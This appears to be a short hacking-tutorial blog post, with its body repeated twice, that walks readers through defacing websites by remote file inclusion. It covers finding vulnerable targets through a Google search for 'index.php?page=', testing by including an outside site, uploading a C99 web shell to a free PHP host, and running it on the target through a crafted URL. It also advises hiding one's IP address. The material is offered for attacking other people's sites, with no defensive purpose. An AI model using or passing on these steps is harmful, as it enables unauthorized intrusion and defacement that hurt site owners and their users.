I receive many E-mails on How To Hack websites so,
today I will demonstrate how hackers use remote file inlcusion to deface websites.
Requirements
C99 shell
First of all visit google and type
"index.php?page="
This will show all the pages which have index.php?page=" in their url, RFI vulnerabilities only work on those sites which have index.php?page= in their url.
Now lets say that the website is as follows:
www.targetsite.com/index.php?page=something
so to check the vulnerability we will replace the something to Google or any other site now if Google homepage shows up in between the website this means that the website is vulnerable to the attack.The url will look like
www.targetsite.com/index.php?page=www.google.com
Once we know that the website is vulnerable to the attack we will now include the c99 shell.To do it download the c99 shell and then upload it to a webhosting site such as ripway,t35&many morer php webhostings .
Once the shell is uploaded you will have a unique url for your shell lets say it is
www.webhostingsite.com/c99.txt
Now to execute the shell in order to gain access to the website we will do as follows
http://www.targetsite.com/index.php?...e.com/c99.txt?
Dont forgett the "?" or else it wont be executed.
Remeber this does not work on all websites so the key is to try and try and try and try!
the most important thing required is skills nd a vulnerability without vulnerability u could do nothing. Also hide ur ip .
thnxx @devendra
today I will demonstrate how hackers use remote file inlcusion to deface websites.
Requirements
C99 shell
First of all visit google and type
"index.php?page="
This will show all the pages which have index.php?page=" in their url, RFI vulnerabilities only work on those sites which have index.php?page= in their url.
Now lets say that the website is as follows:
www.targetsite.com/index.php?page=something
so to check the vulnerability we will replace the something to Google or any other site now if Google homepage shows up in between the website this means that the website is vulnerable to the attack.The url will look like
www.targetsite.com/index.php?page=www.google.com
Once we know that the website is vulnerable to the attack we will now include the c99 shell.To do it download the c99 shell and then upload it to a webhosting site such as ripway,t35&many morer php webhostings .
Once the shell is uploaded you will have a unique url for your shell lets say it is
www.webhostingsite.com/c99.txt
Now to execute the shell in order to gain access to the website we will do as follows
http://www.targetsite.com/index.php?...e.com/c99.txt?
Dont forgett the "?" or else it wont be executed.
Remeber this does not work on all websites so the key is to try and try and try and try!
the most important thing required is skills nd a vulnerability without vulnerability u could do nothing. Also hide ur ip .
thnxx @devendra
How to hack websites using Remote file inlcusion(RFI techniques)